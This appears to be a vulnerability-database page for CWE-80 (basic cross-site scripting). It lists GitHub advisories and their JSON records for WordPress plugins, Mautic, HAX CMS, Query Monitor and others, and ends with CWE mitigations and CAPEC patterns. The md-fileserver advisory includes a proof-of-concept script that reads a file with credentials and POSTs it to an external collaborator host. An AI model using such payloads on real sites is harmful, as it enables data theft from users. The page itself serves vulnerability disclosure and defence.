Common Weakness Enumeration

CWE-80

Allowed

Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)

Abstraction: Variant · Status: Incomplete

The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special characters such as "<", ">", and "&" that could be interpreted as web-scripting elements when they are sent to a downstream component that processes web pages.

936 vulnerabilities reference this CWE, most recent first.

GHSA-2PQQ-4JJP-FMR3

Vulnerability from github – Published: 2025-05-03 03:30 – Updated: 2025-05-03 03:30
VLAI
Details

The Subpage List plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'subpages' shortcode in all versions up to, and including, 1.3.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-4168"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-80"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-05-03T03:15:28Z",
    "severity": "MODERATE"
  },
  "details": "The Subpage List plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin\u0027s \u0027subpages\u0027 shortcode in all versions up to, and including, 1.3.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.",
  "id": "GHSA-2pqq-4jjp-fmr3",
  "modified": "2025-05-03T03:30:28Z",
  "published": "2025-05-03T03:30:28Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-4168"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/subpage-view/trunk/inc/class-subpage-list-shortcode.php#L25"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/aca48ddf-4256-4a55-bff5-1718110147dd?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-2PV7-J3WP-JHRP

Vulnerability from github – Published: 2025-03-27 15:31 – Updated: 2025-03-27 15:31
VLAI
Details

IBM UrbanCode Deploy (UCD) 7.0 through 7.0.5.25, 7.1 through 7.1.2.21, 7.2 through 7.2.3.14, and 7.3 through 7.3.2.0 / IBM DevOps Deploy 8.0 through 8.0.1.4 and 8.1 through 8.1 could allow unauthorized access to other services or potential exposure of sensitive data due to missing authentication in its Agent Relay service.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-1997"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-80"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-03-27T15:15:54Z",
    "severity": "MODERATE"
  },
  "details": "IBM UrbanCode Deploy (UCD) 7.0 through 7.0.5.25, 7.1 through 7.1.2.21, 7.2 through 7.2.3.14, and 7.3 through 7.3.2.0 / IBM DevOps Deploy 8.0 through 8.0.1.4 and 8.1 through 8.1 could allow unauthorized access to other services or potential exposure of sensitive data due to missing authentication in its Agent Relay service.",
  "id": "GHSA-2pv7-j3wp-jhrp",
  "modified": "2025-03-27T15:31:10Z",
  "published": "2025-03-27T15:31:10Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1997"
    },
    {
      "type": "WEB",
      "url": "https://www.ibm.com/support/pages/node/7229035"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-2QH7-289H-FHW7

Vulnerability from github – Published: 2025-10-22 15:31 – Updated: 2026-01-20 15:31
VLAI
Details

Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in AmentoTech Doctreat doctreat allows Code Injection.This issue affects Doctreat: from n/a through <= 1.6.7.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-58970"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-80"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-10-22T15:15:53Z",
    "severity": "MODERATE"
  },
  "details": "Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in AmentoTech Doctreat doctreat allows Code Injection.This issue affects Doctreat: from n/a through \u003c= 1.6.7.",
  "id": "GHSA-2qh7-289h-fhw7",
  "modified": "2026-01-20T15:31:28Z",
  "published": "2025-10-22T15:31:17Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58970"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/Wordpress/Theme/doctreat/vulnerability/wordpress-doctreat-theme-1-6-7-content-injection-vulnerability?_s_id=cve"
    },
    {
      "type": "WEB",
      "url": "https://vdp.patchstack.com/database/Wordpress/Theme/doctreat/vulnerability/wordpress-doctreat-theme-1-6-7-content-injection-vulnerability"
    },
    {
      "type": "WEB",
      "url": "https://vdp.patchstack.com/database/Wordpress/Theme/doctreat/vulnerability/wordpress-doctreat-theme-1-6-7-content-injection-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-2RC5-2755-V422

Vulnerability from github – Published: 2024-04-11 21:36 – Updated: 2024-09-30 13:44
VLAI
Summary
Mautic vulnerable to stored cross-site scripting in description field
Details

Impact

Prior to the patched version, there is an XSS vulnerability in the description fields within the Mautic application which could be exploited by a logged in user of Mautic with the appropriate permissions.

This could lead to the user having elevated access to the system.

Patches

Update to 4.4.12

Workarounds

None

References

  • https://owasp.org/www-project-top-ten/2017/A7_2017-Cross-Site_Scripting_(XSS)
  • https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/02-Testing_for_Stored_Cross_Site_Scripting

If you have any questions or comments about this advisory:

Email us at security@mautic.org

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "mautic/core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.0.0-beta2"
            },
            {
              "fixed": "4.4.12"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-27915"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79",
      "CWE-80"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-04-11T21:36:29Z",
    "nvd_published_at": "2024-09-17T14:15:14Z",
    "severity": "HIGH"
  },
  "details": "### Impact\nPrior to the patched version, there is an XSS vulnerability in the description fields within the Mautic application which could be exploited by a logged in user of Mautic with the appropriate permissions.\n\nThis could lead to the user having elevated access to the system.\n\n### Patches\nUpdate to 4.4.12\n\n### Workarounds\nNone\n\n### References\n- https://owasp.org/www-project-top-ten/2017/A7_2017-Cross-Site_Scripting_(XSS)\n- https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/02-Testing_for_Stored_Cross_Site_Scripting\n\nIf you have any questions or comments about this advisory:\n\nEmail us at [security@mautic.org](mailto:security@mautic.org)",
  "id": "GHSA-2rc5-2755-v422",
  "modified": "2024-09-30T13:44:34Z",
  "published": "2024-04-11T21:36:29Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/mautic/mautic/security/advisories/GHSA-2rc5-2755-v422"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-27915"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mautic/mautic/commit/2d648394e183b1d2d910cea32e89d40a5915b5d4"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/mautic/mautic"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Mautic vulnerable to stored cross-site scripting in description field"
}

GHSA-2VC4-3HX7-V7V7

Vulnerability from github – Published: 2025-06-09 17:43 – Updated: 2025-06-09 21:43
VLAI
Summary
Hax CMS Stored Cross-Site Scripting vulnerability
Details

Summary

The application does not sufficiently sanitize user input, allowing for the execution of arbitrary JavaScript code. The 'saveNode' and 'saveManifest' endpoints take user input and store it in the JSON schema for the site. This content is then rendered in the generated HAX site.

Although the application does not allow users to supply a 'script' tag, it does allow the use of other HTML tags to run JavaScript.

Affected Resources

Impact

An authenticated attacker can use the site editor and settings editor to store malicious payloads in a HAX site which execute arbitrary JavaScript when a user visits the site. This can be used to steal a user's session cookie or other sensitive data.

PoCs

saveNode

To replicate this vulnerability, an attacker can use the "View Source" functionality within the site editor to enter a malicious payload.

  1. Select "View Source" within the HAX site editor and enter an XSS payload that does not use the "script" HTML tag.

image

  1. Select "Update HTML" and observe the resulting alert.

image

image

saveManifest

To exploit the 'SaveManifest' endpoint, an attacker can insert executable code into the URL field of the site settings editor: any payload added this way will execute when the site is loaded.

  1. Open the site settings editor.

image

  1. Add JavaScript code to the URL field under the "Theme" header.

image

  1. Reload the page to run the script.

image

  1. The resulting page source will contain the script.

image

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "elmsln/haxcms"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "11.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-49137"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79",
      "CWE-80",
      "CWE-87"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-06-09T17:43:37Z",
    "nvd_published_at": "2025-06-09T21:15:46Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nThe application does not sufficiently sanitize user input, allowing for the execution of arbitrary JavaScript code. The \u0027saveNode\u0027 and \u0027saveManifest\u0027 endpoints take user input and store it in the JSON schema for the site. This content is then rendered in the generated HAX site.\n\nAlthough the application does not allow users to supply a \u0027script\u0027 tag, it does allow the use of other HTML tags to run JavaScript.\n\n### Affected Resources\n\n- [Operations.php:258](https://github.com/haxtheweb/haxcms-php/blob/master/system/backend/php/lib/Operations.php#L258) `saveManifest()`\n- [Operations.php:868](https://github.com/haxtheweb/haxcms-php/blob/master/system/backend/php/lib/Operations.php#L868) `saveNode()`\n- `https://\u003csite\u003e/\u003cuser\u003e/system/api/saveNode`\n- `https://\u003csite\u003e/\u003cuser\u003e/system/api/saveManifest`\n\n### Impact\n\nAn authenticated attacker can use the site editor and settings editor to store malicious payloads in a HAX site which execute arbitrary JavaScript when a user visits the site. This can be used to steal a user\u0027s session cookie or other sensitive data.\n\n### PoCs\n\n#### saveNode\n\nTo replicate this vulnerability, an attacker can use the \"View Source\" functionality within the site editor to enter a malicious payload.\n\n1. Select \"View Source\" within the HAX site editor and enter an XSS payload that does not use the \"script\" HTML tag.\n\n![image](https://github.com/user-attachments/assets/c22c52e6-079a-4add-94a2-b51b1a925a96)\n\n3. Select \"Update HTML\" and observe the resulting alert.\n\n![image](https://github.com/user-attachments/assets/df2da026-de47-4f65-bbc2-c4dbc8fb77e5)\n\n![image](https://github.com/user-attachments/assets/d593418c-73c6-4210-953e-faca8405174c)\n\n#### saveManifest\n\nTo exploit the \u0027SaveManifest\u0027 endpoint, an attacker can insert executable code into the URL field of the site settings editor: any payload added this way will execute when the site is loaded.\n\n1. Open the site settings editor.\n\n![image](https://github.com/user-attachments/assets/f7faa998-58ec-4085-9c65-d6a9f3831587)\n\n3. Add JavaScript code to the URL field under the \"Theme\" header.\n\n![image](https://github.com/user-attachments/assets/a99a7238-bb63-408c-8ca7-22deaffeca83)\n\n5. Reload the page to run the script.\n\n![image](https://github.com/user-attachments/assets/e634b1f3-58c1-44f6-8c8a-814773e69e83)\n\n7. The resulting page source will contain the script.\n\n![image](https://github.com/user-attachments/assets/a022d9d2-a6bf-41ad-a9f2-44a6a2f0fa07)",
  "id": "GHSA-2vc4-3hx7-v7v7",
  "modified": "2025-06-09T21:43:59Z",
  "published": "2025-06-09T17:43:37Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/haxtheweb/issues/security/advisories/GHSA-2vc4-3hx7-v7v7"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-49137"
    },
    {
      "type": "WEB",
      "url": "https://github.com/haxtheweb/haxcms-php/commit/0dd3e98fe2fadd0793b667d4af2aac230980e0f8"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/haxtheweb/issues"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Hax CMS Stored Cross-Site Scripting vulnerability"
}

GHSA-2WWR-RX4C-Q4HX

Vulnerability from github – Published: 2026-02-03 18:30 – Updated: 2026-02-04 18:30
VLAI
Details

ERPNext thru 15.88.1 does not sanitize or remove certain HTML tags specifically <a> hyperlinks in fields that are intended for plain text. Although JavaScript is blocked (preventing XSS), the HTML is still preserved in the generated PDF document. As a result, an attacker can inject malicious clickable links into an ERP-generated PDF. Since PDF files generated by the ERP system are generally considered trustworthy, users are highly likely to click these links, potentially enabling phishing attacks or malware delivery. This issue occurs in the Add Quality Goal' function.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-65924"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-80"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-02-03T18:16:15Z",
    "severity": "MODERATE"
  },
  "details": "ERPNext thru 15.88.1 does not sanitize or remove certain HTML tags specifically `\u003ca\u003e` hyperlinks in fields that are intended for plain text. Although JavaScript is blocked (preventing XSS), the HTML is still preserved in the generated PDF document. As a result, an attacker can inject malicious clickable links into an ERP-generated PDF. Since PDF files generated by the ERP system are generally considered trustworthy, users are highly likely to click these links, potentially enabling phishing attacks or malware delivery. This issue occurs in the Add Quality Goal\u0027 function.",
  "id": "GHSA-2wwr-rx4c-q4hx",
  "modified": "2026-02-04T18:30:31Z",
  "published": "2026-02-03T18:30:47Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-65924"
    },
    {
      "type": "WEB",
      "url": "https://github.com/frappe/frappe_docker.git"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-2XR4-CHCF-VMVF

Vulnerability from github – Published: 2026-03-19 19:37 – Updated: 2026-03-19 19:37
VLAI
Summary
The Query Monitor plugin for WordPress has Reflected Cross-Site Scripting via Request URI
Details

Impact

The Query Monitor plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the $_SERVER['REQUEST_URI'] parameter in all versions up to, and including, 3.20.3 due to insufficient output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick an Administrator-level user into performing an action such as clicking on a link.

On admin requests, the plugin reads user controlled data from $_SERVER['REQUEST_URI'] and stores it in the request field, then renders request, matched_query, and query_string through format_url(). If the attacker supplied string does not contain &, format_url() returns it without HTML escaping, which allows injected HTML or JavaScript from the request target to be inserted directly into the page inside a <code> element and executed in the victim's browser.

Patches

This issue has been patched in Query Monitor 3.20.4.

Credits

Many thanks to Dmitrii Ignatyev at CleanTalk for responsibly disclosing this vulnerability.

How can I report a security bug?

You can submit a private security vulnerability report to Query Monitor via the Security tab on the GitHub repo. The GitHub Security Advisory process facilitates private collaboration on security issues. You'll receive credit for a valid report and a CVE if necessary.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "johnbillion/query-monitor"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.20.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-4267"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-80"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-19T19:37:04Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Impact\n\nThe Query Monitor plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER[\u0027REQUEST_URI\u0027]` parameter in all versions up to, and including, 3.20.3 due to insufficient output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick an Administrator-level user into performing an action such as clicking on a link.\n\nOn admin requests, the plugin reads user controlled data from `$_SERVER[\u0027REQUEST_URI\u0027]` and stores it in the request field, then renders `request`, `matched_query`, and `query_string` through `format_url()`. If the attacker supplied string does not contain `\u0026`, `format_url()` returns it without HTML escaping, which allows injected HTML or JavaScript from the request target to be inserted directly into the page inside a `\u003ccode\u003e` element and executed in the victim\u0027s browser.\n\n### Patches\n\nThis issue has been patched in Query Monitor 3.20.4.\n\n### Credits\n\nMany thanks to Dmitrii Ignatyev at CleanTalk for responsibly disclosing this vulnerability.\n\n### How can I report a security bug?\n\nYou can submit a private security vulnerability report to Query Monitor via [the Security tab on the GitHub repo](https://github.com/johnbillion/query-monitor/security). The GitHub Security Advisory process facilitates private collaboration on security issues. You\u0027ll receive credit for a valid report and a CVE if necessary.",
  "id": "GHSA-2xr4-chcf-vmvf",
  "modified": "2026-03-19T19:37:04Z",
  "published": "2026-03-19T19:37:04Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/johnbillion/query-monitor/security/advisories/GHSA-2xr4-chcf-vmvf"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/johnbillion/query-monitor"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "The Query Monitor plugin for WordPress has Reflected Cross-Site Scripting via Request URI"
}

GHSA-328F-3QHJ-7364

Vulnerability from github – Published: 2022-05-24 17:46 – Updated: 2022-05-24 17:46
VLAI
Details

A vulnerability in certain web pages of Cisco Webex Meetings could allow an unauthenticated, remote attacker to modify a web page in the context of a user's browser. The vulnerability is due to improper checks on parameter values in affected pages. An attacker could exploit this vulnerability by persuading a user to follow a crafted link that is designed to pass HTML code into an affected parameter. A successful exploit could allow the attacker to alter the contents of a web page to redirect the user to potentially malicious websites, or the attacker could use this vulnerability to conduct further client-side attacks.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-1420"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-80"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-04-08T04:15:00Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability in certain web pages of Cisco Webex Meetings could allow an unauthenticated, remote attacker to modify a web page in the context of a user\u0027s browser. The vulnerability is due to improper checks on parameter values in affected pages. An attacker could exploit this vulnerability by persuading a user to follow a crafted link that is designed to pass HTML code into an affected parameter. A successful exploit could allow the attacker to alter the contents of a web page to redirect the user to potentially malicious websites, or the attacker could use this vulnerability to conduct further client-side attacks.",
  "id": "GHSA-328f-3qhj-7364",
  "modified": "2022-05-24T17:46:52Z",
  "published": "2022-05-24T17:46:52Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-1420"
    },
    {
      "type": "WEB",
      "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-VObwRKWV"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-32Q2-HHR5-6QVV

Vulnerability from github – Published: 2026-05-21 17:57 – Updated: 2026-06-09 18:41
VLAI
Summary
md-fileserver: Stored/Reflected XSS when viewing Markdown (raw HTML allowed)
Details

Summary

A cross-site scripting (XSS) vulnerability exists in the application’s Markdown rendering logic. When user-supplied Markdown content is rendered, embedded raw HTML—including tags—is processed and injected into the resulting page without sanitization, allowing arbitrary JavaScript execution in the context of the affected domain.

Details

An attacker can craft malicious Markdown content containing tags or event handlers (e.g., ). When this Markdown is viewed or previewed, the embedded JavaScript executes in the victim’s browser.

Vulnerable Components

config.js → markdownIt: { html: true } (Lines 26–30) The Markdown renderer is explicitly configured to allow raw HTML.

lib/markd.js (Lines 33–58) Renders Markdown content without sanitizing HTML, allowing unsafe tags and attributes to remain in the output.

lib/pages/template.html The rendered Markdown is injected into the HTML template using <%= markdown %> without sanitization or output encoding.

PoC

Create a pwn.md

# Hello

<script>
  fetch('/etc/passwd', { credentials: 'include' })
    .then(r => r.text())
    .then(t => fetch('https://79evxsw3m08qfyvxluebgl0pyg47szgo.oastify.com/exfil', { method: 'POST', body: t }));
</script>

Open it on browser. image View the HTTP request in Burp Collaborator. image

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim’s browser, leading to: - Session hijacking - Account takeover - Credential theft - Defacement or injection of malicious content - Exfiltration of sensitive data via API tokens, CSRF tokens, or user information

This affects all users who can view Markdown content within the application.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "md-fileserver"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.10.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-46492"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-80",
      "CWE-87"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-21T17:57:32Z",
    "nvd_published_at": "2026-06-09T17:17:33Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nA cross-site scripting (XSS) vulnerability exists in the application\u2019s Markdown rendering logic. When user-supplied Markdown content is rendered, embedded raw HTML\u2014including \u003cscript\u003e tags\u2014is processed and injected into the resulting page without sanitization, allowing arbitrary JavaScript execution in the context of the affected domain.\n\n### Details\nAn attacker can craft malicious Markdown content containing \u003cscript\u003e tags or event handlers (e.g., \u003cimg onerror=...\u003e). When this Markdown is viewed or previewed, the embedded JavaScript executes in the victim\u2019s browser.\n\n### Vulnerable Components\nconfig.js \u2192 markdownIt: { html: true } (Lines 26\u201330)\nThe Markdown renderer is explicitly configured to allow raw HTML.\n\nlib/markd.js (Lines 33\u201358)\nRenders Markdown content without sanitizing HTML, allowing unsafe tags and attributes to remain in the output.\n\nlib/pages/template.html\nThe rendered Markdown is injected into the HTML template using \u003c%= markdown %\u003e without sanitization or output encoding.\n\n### PoC\nCreate a pwn.md \n```\n# Hello\n\n\u003cscript\u003e\n  fetch(\u0027/etc/passwd\u0027, { credentials: \u0027include\u0027 })\n    .then(r =\u003e r.text())\n    .then(t =\u003e fetch(\u0027https://79evxsw3m08qfyvxluebgl0pyg47szgo.oastify.com/exfil\u0027, { method: \u0027POST\u0027, body: t }));\n\u003c/script\u003e\n\n```\nOpen it on browser.\n\u003cimg width=\"944\" height=\"238\" alt=\"image\" src=\"https://github.com/user-attachments/assets/cd9e1396-9f4b-4a4b-bc2a-d7530c0c00ac\" /\u003e\nView the HTTP request in Burp Collaborator.\n\u003cimg width=\"1328\" height=\"468\" alt=\"image\" src=\"https://github.com/user-attachments/assets/9faa65ad-73ec-42d0-9ce3-ea78b15294d8\" /\u003e\n\n\n### Impact\nSuccessful exploitation allows an attacker to execute arbitrary JavaScript in the victim\u2019s browser, leading to:\n- Session hijacking\n- Account takeover\n- Credential theft\n- Defacement or injection of malicious content\n- Exfiltration of sensitive data via API tokens, CSRF tokens, or user information\n\nThis affects all users who can view Markdown content within the application.",
  "id": "GHSA-32q2-hhr5-6qvv",
  "modified": "2026-06-09T18:41:40Z",
  "published": "2026-05-21T17:57:32Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/commenthol/md-fileserver/security/advisories/GHSA-32q2-hhr5-6qvv"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-46492"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/commenthol/md-fileserver"
    },
    {
      "type": "WEB",
      "url": "https://github.com/commenthol/md-fileserver/releases/tag/v1.10.3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "md-fileserver: Stored/Reflected XSS when viewing Markdown (raw HTML allowed)"
}

GHSA-333R-822H-H7J4

Vulnerability from github – Published: 2026-01-08 12:30 – Updated: 2026-01-20 15:33
VLAI
Details

Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Noor Alam Easy Media Download easy-media-download allows Reflection Injection.This issue affects Easy Media Download: from n/a through <= 1.1.11.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-69169"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-80"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-01-08T10:15:54Z",
    "severity": "MODERATE"
  },
  "details": "Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Noor Alam Easy Media Download easy-media-download allows Reflection Injection.This issue affects Easy Media Download: from n/a through \u003c= 1.1.11.",
  "id": "GHSA-333r-822h-h7j4",
  "modified": "2026-01-20T15:33:11Z",
  "published": "2026-01-08T12:30:31Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69169"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/Wordpress/Plugin/easy-media-download/vulnerability/wordpress-easy-media-download-plugin-1-1-11-css-injection-vulnerability?_s_id=cve"
    },
    {
      "type": "WEB",
      "url": "https://vdp.patchstack.com/database/Wordpress/Plugin/easy-media-download/vulnerability/wordpress-easy-media-download-plugin-1-1-11-css-injection-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Implementation

Carefully check each input parameter against a rigorous positive specification (allowlist) defining the specific characters and format allowed. All input should be neutralized, not just parameters that the user is supposed to specify, but all data in the request, including hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. We often encounter data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended.

Mitigation MIT-30.1
Implementation

Strategy: Output Encoding

  • Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component.
  • The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks.
Mitigation MIT-43
Implementation

With Struts, write all data from form beans with the bean's filter attribute set to true.

Mitigation MIT-31
Implementation

Strategy: Attack Surface Reduction

To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XmlHttpRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.

CAPEC-18: XSS Targeting Non-Script Elements

This attack is a form of Cross-Site Scripting (XSS) where malicious scripts are embedded in elements that are not expected to host scripts such as image tags (<img>), comments in XML documents (< !-CDATA->), etc. These tags may not be subject to the same input validation, output validation, and other content filtering and checking routines, so this can create an opportunity for an adversary to tunnel through the application's elements and launch a XSS attack through other elements. As with all remote attacks, it is important to differentiate the ability to launch an attack (such as probing an internal network for unpatched servers) and the ability of the remote adversary to collect and interpret the output of said attack.

CAPEC-193: PHP Remote File Inclusion

In this pattern the adversary is able to load and execute arbitrary code remotely available from the application. This is usually accomplished through an insecurely configured PHP runtime environment and an improperly sanitized "include" or "require" call, which the user can then control to point to any web-accessible file. This allows adversaries to hijack the targeted application and force it to execute their own instructions.

CAPEC-32: XSS Through HTTP Query Strings

An adversary embeds malicious script code in the parameters of an HTTP query string and convinces a victim to submit the HTTP request that contains the query string to a vulnerable web application. The web application then procedes to use the values parameters without properly validation them first and generates the HTML code that will be executed by the victim's browser.

CAPEC-86: XSS Through HTTP Headers

An adversary exploits web applications that generate web content, such as links in a HTML page, based on unvalidated or improperly validated data submitted by other actors. XSS in HTTP Headers attacks target the HTTP headers which are hidden from most users and may not be validated by web applications.